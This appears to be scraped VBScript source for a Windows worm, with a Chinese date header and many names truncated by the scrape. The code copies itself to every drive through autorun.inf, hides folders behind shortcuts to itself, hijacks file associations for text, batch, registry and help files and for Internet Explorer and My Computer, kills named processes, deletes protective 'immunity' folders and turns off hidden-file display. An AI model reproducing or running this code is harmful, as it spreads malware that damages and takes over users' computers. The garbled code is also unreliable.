2024年1月7日发(作者:)

Case "oie" RunPath="""%ProgramFiles%Internet """ Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad) Case "omc" RunPath=" /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad)

Case "emc" RunPath=" /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad) Case Else If PreDblInstance=True Then End If Timeout = Datediff("ww", GetInfectedDate, Date) - 12 If Timeout>0 And Month(Date) = Day(Date) Then Call VirusAlert() Call MakeJoke(CInt(Month(Date))) End If Call MonitorSystem()

End SelectEnd SubSub MonitorSystem() On Error Resume Next Dim ProcessNames, ExeFullNames ProcessNames=Array("","","","","","","") VBSFullNames=Array(GetMainVirus(1)) Do Call KillProcess(ProcessNames) Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)) Call KeepProcess(VBSFullNames) 3000 LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath) On Error Resume Next Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version Load_Value=""""&VirusLoadPath&"""" File_Value="%SystemRoot% "&""""&VirusAssPath&""""&" %1 %* " IE_Value="%SystemRoot% "&""""&VirusAssPath&""""&" OIE " MyCpt_Value1="%SystemRoot% "&""""&VirusAssPath&""""&" OMC " MyCpt_Value2="%SystemRoot% "&""""&VirusAssPath&""""&" EMC " HCULoad="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsLoad" HCUVer="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsVer" HCUDate="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsDate" VirusCode=GetCode(FullName) Version=1 HostSourcePath=cialFolder(1)&"" HostFilePath=cialFolder(0)&""

For Each Drive In If y and (ype=1 Or ype=2 Or ype=3) Then DiskVirusName=GetSerialNumber(etter)&".vbs" Call CreateAutoRun(etter,DiskVirusName)

Call CreateAutoRun(etter,DiskVirusName) Call InfectRoot(etter,DiskVirusName) End If Next

If ists(VirusAssPath)=False Or ists(VirusLoadPath)=False Or ists(HostFilePath)=False Or GetVersion()< Version Then If GetFileSystemType(GetSystemDrive())="NTFS" Then Call CreateFile(VirusCode,VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) Call CopyFile(HostSourcePath,HostFilePath) Call SetHiddenAttr(HostFilePath) Else Call CreateFile(VirusCode, VirusAssPath) Call SetHiddenAttr(VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) Call SetHiddenAttr(VirusLoadPath) Call CopyFile(HostSourcePath, HostFilePath) Call SetHiddenAttr(HostFilePath) End If End If

If ReadReg(HCULoad)<>Load_Value Then Call WriteReg (HCULoad, Load_Value, "") End If

If GetVersion() < Version Then Call WriteReg (HCUVer, Version, "") End If

If GetInfectedDate() = "" Then Call WriteReg (HCUDate, Date, "") End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand")<>File_Value Then Call SetTxtFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesinifileshellopencommand")<>File_Value Then Call SetIniFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesinffileshellopencommand")<>File_Value Then Call SetInfFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesbatfileshellopencommand")<>File_Value Then Call SetBatFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassescmdfileshellopencommand")<>File_Value Then Call SetCmdFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesregfileshellopencommand")<>File_Value Then Call SetRegFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_ellopencommand")<>File_Value Then Call SetchmFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClasseshlpfileshellopencommand")<>File_Value Then Call SethlpFileAss(VirusAssPath) End If

If ReadReg("HKEY_LOCAL_llopencommand")<>IE_Value Then

If ReadReg("HKEY_LOCAL_llopencommand")<>IE_Value Then Call SetIEAss(VirusAssPath) End If

If ReadReg("HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand")<>IE_Value Then Call SetIEAss(VirusAssPath) End If

If ReadReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellopencommand")<>MyCpt_Value1 Then Call SetMyComputerAss(VirusAssPath) End If

If ReadReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellexplorecommand")<>MyCpt_Value2 Then Call SetMyComputerAss(VirusAssPath) End If

Call RegSet()End SubSub CopyFile(source, pathf) On Error Resume Next If ists(pathf) Then File pathf , True End If

le source, pathfEnd SubSub CreateFile(code, pathf) On Error Resume Next Dim FileText If ists(pathf) Then Set FileText=xtFile(pathf, 2, False) code Else Set FileText=xtFile(pathf, 2, True) code End IfEnd SubSub CreateFile(code, pathf) On Error Resume Next Dim FileText If ists(pathf) Then Set FileText=xtFile(pathf, 2, False) code Else Set FileText=xtFile(pathf, 2, True) code End IfEnd SubSub RegSet() On Error Resume Next

Dim RegPath1 , RegPath2, RegPath3, RegPath4 RegPath1="HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenNOHIDDENCheckedValue" RegPath2="HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue" RegPath3="HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun" RegPath4="HKEY_CLASSES_ROOTlnkfileIsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4)

End SubSub KillProcess(ProcessNames) On Error Resume Next Set WMIService=GetObject("winmgmts:.rootcimv2") For Each ProcessName in ProcessNames

Set ProcessList=ery(" Select * From win32_process where name ='"&ProcessName&"' ") For Each Process in ProcessList IntReturn=ate If intReturn<>0 Then "CMD /c ntsd -c q -p "&, vbHide, False End If Next NextEnd SubSub KillImmunity(D) On Error Resume Next ImmunityFolder=D&":" If Exists(ImmunityFolder) Then ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True End IfEnd SubSub KeepProcess(VBSFullNames) On Error Resume Next For Each VBSFullName in VBSFullNames

If VBSProcessCount(VBSFullName) < 2 then Run("%SystemRoot% "&VBSFullName) End If NextEnd SubFunction GetSystemDrive() GetSystemDrive=Left(cialFolder(0),2)End FunctionFunction GetFileSystemType(Drive) Set d=ve(Drive) GetFileSystemType=stemEnd FunctionFunction ReadReg(strkey) Dim tmps Set tmps=CreateObject("") ReadReg=d(strkey) Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype) Dim tmps Set tmps=CreateObject("") If vtype="" Then te strkey, Value Else te strkey, Value, vtype End If Set tmps=NothingEnd SubSub DeleteReg(strkey) Dim tmps Set tmps=CreateObject("") ete strkey

Set tmps=NothingEnd SubSub SetHiddenAttr(path) On Error Resume Next Dim vf Set vf=e(path) Set vf=der(path) utes=6End SubSub Run(ExeFullName) On Error Resume Next Dim WshShell Set WshShell=Object("") ExeFullName Set WshShell=NothingEnd SubSub InfectRoot(D,VirusName) On Error Resume Next Dim VBSCode VBSCode=GetCode(FullName) VBSPath=D&":"&VirusName If ists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) End If Set Folder=der(D&":") Set SubFolders=ders For Each SubFolder In SubFolders SetHiddenAttr() LnkPath=D&":"&&".lnk" TargetPath=D&":"&VirusName Args=""""&D&":"&& "Dir""" If ists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then If ists(LnkPath)=True Then File LnkPath, True End If Call CreateShortcut(LnkPath,TargetPath,Args) End If NextEnd Sub

Sub CreateShortcut(LnkPath,TargetPath,Args) Set Shortcut=Shortcut(LnkPath) with Shortcut .TargetPath=TargetPath .Arguments=Args .WindowStyle=4 .IconLocation="%SystemRoot%, 3" .Save end withEnd SubSub CreateAutoRun(D,VirusName) On Error Resume Next Dim InfPath, VBSPath, VBSCode InfPath=D&":" VBSPath=D&":"&VirusName VBSCode=GetCode(FullName) If ists(InfPath)=False Or ists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) StrInf="[AutoRun]"&VBCRLF&"Shellexecute= "&VirusName&" ""AutoRun"""&VBCRLF&"shellopen=打开(&O)"&VBCRLF&"shellopencommand=WScr

Call KillImmunity(D) Call CreateFile(StrInf, InfPath) Call SetHiddenAttr(InfPath) End IfEnd SubSub SetTxtFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesinifileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesinffileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesbatfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassescmdfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClasseshlpfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesregfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_ellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetIEAss(sFilePath) On Error Resume Next Dim Value

Value="%SystemRoot% "&""""&sFilePath&""""&" OIE " Call WriteReg("HKEY_LOCAL_llopencommand", Value, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath) On Error Resume Next Dim Value1,Value2 Value1="%SystemRoot% "&""""&sFilePath&""""&" OMC " Value2="%SystemRoot% "&""""&sFilePath&""""&" EMC " Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shell", "", "REG_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellopencommand", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellexplorecommand", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv) On Error Resume Next Set d=ve(Drv) GetSerialNumber=Number GetSerialNumber=Replace(GetSerialNumber,"-","")End FunctionFunction GetMainVirus(N) On Error Resume Next MainVirusName=GetSerialNumber(GetSystemDrive())&".vbs" If GetFileSystemType(GetSystemDrive())="NTFS" Then If N=1 Then GetMainVirus=cialFolder(N)&":"&MainVirusName End If If N=0 Then GetMainVirus=cialFolder(N)&":"&MainVirusName End If Else GetMainVirus=cialFolder(N)&""&MainVirusName End IfEnd FunctionFunction VBSProcessCount(VBSPath) On Error Resume Next Dim WMIService, ProcessList, Process VBSProcessCount=0 Set WMIService=GetObject("winmgmts:.rootcimv2") Set ProcessList=ery("Select * from Win32_Process Where "&"Name='' or Name='' or Name=''") For Each Process in ProcessList If InStr(dLine, VBSPath)>0 Then VBSProcessCount=VBSProcessCount+1 End If NextEnd FunctionFunction PreDblInstance() On Error Resume Next PreDblInstance=False If VBSProcessCount(FullName)>= 3 Then PreDblInstance=True End IfEnd FunctionFunction GetTargetPath(LnkPath) On Error Resume Next Dim Shortcut Set Shortcut=Shortcut(LnkPath) GetTargetPath=PathEnd Function